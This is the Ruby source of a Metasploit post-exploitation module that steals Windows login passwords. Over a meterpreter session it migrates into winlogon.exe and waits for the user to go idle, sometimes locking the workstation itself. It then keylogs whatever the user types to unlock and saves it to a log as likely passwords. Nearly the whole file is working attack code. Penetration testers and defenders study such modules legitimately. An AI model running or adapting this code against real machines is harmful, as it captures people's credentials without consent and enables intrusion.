251 lines
7.6 KiB
Ruby
251 lines
7.6 KiB
Ruby
|
##
|
||
|
# $Id$
|
||
|
##
|
||
|
|
||
|
##
|
||
|
# This file is part of the Metasploit Framework and may be subject to
|
||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||
|
# Framework web site for more information on licensing and terms of use.
|
||
|
# http://metasploit.com/framework/
|
||
|
##
|
||
|
|
||
|
require 'msf/core'
|
||
|
require 'rex'
|
||
|
require 'msf/core/post/file'
|
||
|
|
||
|
class Metasploit3 < Msf::Post
|
||
|
|
||
|
include Msf::Post::File
|
||
|
|
||
|
def initialize(info={})
|
||
|
super( update_info(info,
|
||
|
'Name' => 'Winlogon Lockout Credential Keylogger',
|
||
|
'Description' => %q{
|
||
|
This module migrates and logs Microsoft Windows user's passwords via
|
||
|
Winlogon.exe. Using idle time and natural system changes to give a
|
||
|
false sense of security to the user.},
|
||
|
'License' => MSF_LICENSE,
|
||
|
'Author' => ['Rob Fuller <mubix[at]hak5.org>', 'cg'],
|
||
|
'Version' => '$Revision$',
|
||
|
'Platform' => ['windows'],
|
||
|
'SessionTypes' => ['meterpreter'],
|
||
|
'References' => [['URL', 'http://blog.metasploit.com/2010/12/capturing-windows-logons-with.html']]
|
||
|
))
|
||
|
|
||
|
register_options(
|
||
|
[
|
||
|
OptInt.new('INTERVAL',[true, 'Time between key collection during logging',30]),
|
||
|
OptInt.new('HEARTBEAT',[true, 'Heart beat between idle checks',30]),
|
||
|
OptInt.new('LOCKTIME',[true, 'Amount of idletime before lockout',300]),
|
||
|
OptInt.new('PID',[false,'Target PID, only needed if multiple winlogon.exe instances exist',nil]),
|
||
|
OptBool.new('WAIT', [true, 'Wait for lockout instead of default method', false])
|
||
|
], self.class)
|
||
|
end
|
||
|
|
||
|
def check_admin
|
||
|
status = client.railgun.shell32.IsUserAnAdmin()
|
||
|
return status['return']
|
||
|
end
|
||
|
|
||
|
def get_winlogon
|
||
|
winlogon = []
|
||
|
session.sys.process.get_processes().each do |x|
|
||
|
if x['name'].downcase == "winlogon.exe"
|
||
|
winlogon << x
|
||
|
end
|
||
|
end
|
||
|
if winlogon.size == 0
|
||
|
print_status("Winlogon not found! Exiting")
|
||
|
return 'exit'
|
||
|
elsif winlogon.size == 1
|
||
|
return winlogon[0]['pid']
|
||
|
else
|
||
|
print_error("Multiple WINLOGON processes found, run manually and specify pid")
|
||
|
print_error("Be wise. XP / VISTA / 7 use session 0 - 2k3/2k8 use RDP session")
|
||
|
winlogon.each do |tp|
|
||
|
print_status("Winlogon.exe - PID: #{tp['pid']} - Session: #{tp['session']}")
|
||
|
end
|
||
|
return 'exit'
|
||
|
end
|
||
|
end
|
||
|
|
||
|
#Function for starting the keylogger
|
||
|
def startkeylogger(session)
|
||
|
begin
|
||
|
print_status("Starting the keystroke sniffer...")
|
||
|
session.ui.keyscan_start
|
||
|
return true
|
||
|
rescue
|
||
|
print_status("Failed to start Keylogging!")
|
||
|
return false
|
||
|
end
|
||
|
end
|
||
|
|
||
|
# Function for Collecting Capture (pulled from Carlos Perez's Keylogrecorder)
|
||
|
def keycap(session, keytime, logfile)
|
||
|
begin
|
||
|
rec = 1
|
||
|
#Creating DB for captured keystrokes
|
||
|
print_status("Keystrokes being saved in to #{logfile}")
|
||
|
#Inserting keystrokes every number of seconds specified
|
||
|
print_status("Recording ")
|
||
|
while rec == 1
|
||
|
#getting Keystrokes
|
||
|
data = session.ui.keyscan_dump
|
||
|
outp = ""
|
||
|
data.unpack("n*").each do |inp|
|
||
|
fl = (inp & 0xff00) >> 8
|
||
|
vk = (inp & 0xff)
|
||
|
kc = VirtualKeyCodes[vk]
|
||
|
|
||
|
f_shift = fl & (1<<1)
|
||
|
f_ctrl = fl & (1<<2)
|
||
|
f_alt = fl & (1<<3)
|
||
|
|
||
|
if(kc)
|
||
|
name = ((f_shift != 0 and kc.length > 1) ? kc[1] : kc[0])
|
||
|
case name
|
||
|
when /^.$/
|
||
|
outp << name
|
||
|
when /shift|click/i
|
||
|
when 'Space'
|
||
|
outp << " "
|
||
|
else
|
||
|
outp << " <#{name}> "
|
||
|
end
|
||
|
else
|
||
|
outp << " <0x%.2x> " % vk
|
||
|
end
|
||
|
end
|
||
|
sleep(2)
|
||
|
file_local_write(logfile,"#{outp}\n")
|
||
|
if outp != nil and outp.chomp.lstrip != "" then
|
||
|
print_status("Password?: #{outp}")
|
||
|
end
|
||
|
still_locked = 1
|
||
|
# Check to see if the screen saver is on, then check to see if they have logged back in yet.
|
||
|
screensaver = client.railgun.user32.SystemParametersInfoA(114,nil,1,nil)['pvParam'].unpack("C*")[0]
|
||
|
if screensaver == 0
|
||
|
still_locked = client.railgun.user32.GetForegroundWindow()['return']
|
||
|
end
|
||
|
if still_locked == 0
|
||
|
print_status("They logged back in, the last password was probably right.")
|
||
|
raise 'win'
|
||
|
end
|
||
|
currentidle = session.ui.idle_time
|
||
|
if screensaver == 0
|
||
|
print_status("System has currently been idle for #{currentidle} seconds and the screensaver is OFF")
|
||
|
else
|
||
|
print_status("System has currently been idle for #{currentidle} seconds and the screensaver is ON")
|
||
|
end
|
||
|
sleep(keytime.to_i)
|
||
|
end
|
||
|
rescue::Exception => e
|
||
|
if e.message != 'win'
|
||
|
print("\n")
|
||
|
print_status("#{e.class} #{e}")
|
||
|
end
|
||
|
print_status("Stopping keystroke sniffer...")
|
||
|
session.ui.keyscan_stop
|
||
|
end
|
||
|
end
|
||
|
|
||
|
|
||
|
def run
|
||
|
# Log file variables
|
||
|
host,port = session.tunnel_peer.split(':') # Get hostname
|
||
|
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S") # Create Filename info to be appended to downloaded files
|
||
|
logs = ::File.join(Msf::Config.log_directory, 'scripts', 'smartlocker') # Create a directory for the logs
|
||
|
::FileUtils.mkdir_p(logs) # Create the log directory
|
||
|
logfile = logs + ::File::Separator + host + filenameinfo + ".txt" # Logfile name
|
||
|
|
||
|
|
||
|
#Make sure we are on a Windows host
|
||
|
if client.platform !~ /win32|win64/
|
||
|
print_status "This module does not support this meterpreter type"
|
||
|
return
|
||
|
end
|
||
|
|
||
|
# Check admin status
|
||
|
admin = check_admin
|
||
|
if admin == false
|
||
|
print_error("Must be an admin to migrate into Winlogon.exe, exiting")
|
||
|
return
|
||
|
end
|
||
|
|
||
|
mypid = session.sys.process.getpid
|
||
|
if datastore['pid'] == 0
|
||
|
targetpid = get_winlogon
|
||
|
if targetpid == 'exit'
|
||
|
return
|
||
|
end
|
||
|
print_status("Found WINLOGON at PID:#{targetpid}")
|
||
|
else
|
||
|
targetpid = datastore['pid']
|
||
|
print_status("WINLOGON PID:#{targetpid} specified. I'm trusting you...")
|
||
|
end
|
||
|
|
||
|
if mypid == targetpid
|
||
|
print_status("Already in WINLOGON no need to migrate")
|
||
|
else
|
||
|
print_status("Migrating from PID:#{mypid}")
|
||
|
begin
|
||
|
session.core.migrate(targetpid)
|
||
|
rescue
|
||
|
print_error("Unable to migrate, try getsystem first")
|
||
|
return
|
||
|
end
|
||
|
print_status("Migrated to WINLOGON PID: #{targetpid} successfully")
|
||
|
end
|
||
|
|
||
|
# Override SystemParametersInfo Railgun call to check for Screensaver
|
||
|
# Unfortunately 'pvParam' changes it's type for each uiAction so
|
||
|
# it cannot be changed in the regular railgun defs
|
||
|
client.railgun.add_function('user32','SystemParametersInfoA','BOOL',[
|
||
|
["DWORD","uiAction","in"],
|
||
|
["DWORD","uiParam","in"],
|
||
|
["PBLOB","pvParam","out"],
|
||
|
["DWORD","fWinIni","in"]
|
||
|
])
|
||
|
|
||
|
print_good("Keylogging for #{client.info}")
|
||
|
file_local_write(logfile,"#{client.info}\n")
|
||
|
if datastore['wait'] then
|
||
|
print_status("Waiting for user to lock out their session")
|
||
|
locked = false
|
||
|
while locked == false
|
||
|
if client.railgun.user32.GetForegroundWindow()['return'] != 0
|
||
|
locked = true
|
||
|
print_status("Session has been locked out")
|
||
|
else
|
||
|
# sleep(keytime.to_i) / hardsleep applied due to missing loging right after lockout.. no good way to solve this
|
||
|
sleep(2)
|
||
|
end
|
||
|
end
|
||
|
else
|
||
|
currentidle = session.ui.idle_time
|
||
|
print_status("System has currently been idle for #{currentidle} seconds")
|
||
|
while currentidle <= datastore['locktime'] do
|
||
|
print_status("Current Idletime: #{currentidle} seconds")
|
||
|
sleep(datastore['heartbeat'])
|
||
|
currentidle = session.ui.idle_time
|
||
|
end
|
||
|
client.railgun.user32.LockWorkStation()
|
||
|
if client.railgun.user32.GetForegroundWindow()['return'] == 0
|
||
|
print_error("Locking the workstation falied, trying again..")
|
||
|
client.railgun.user32.LockWorkStation()
|
||
|
if client.railgun.user32.GetForegroundWindow()['return'] == 0
|
||
|
print_error("The system will not lock this session, nor will it be used for user login, exiting...")
|
||
|
return
|
||
|
else
|
||
|
print_status("Locked this time, time to start keyloggin...")
|
||
|
end
|
||
|
end
|
||
|
end
|
||
|
|
||
|
if startkeylogger(session)
|
||
|
keycap(session, datastore['interval'], logfile)
|
||
|
end
|
||
|
end
|
||
|
end
|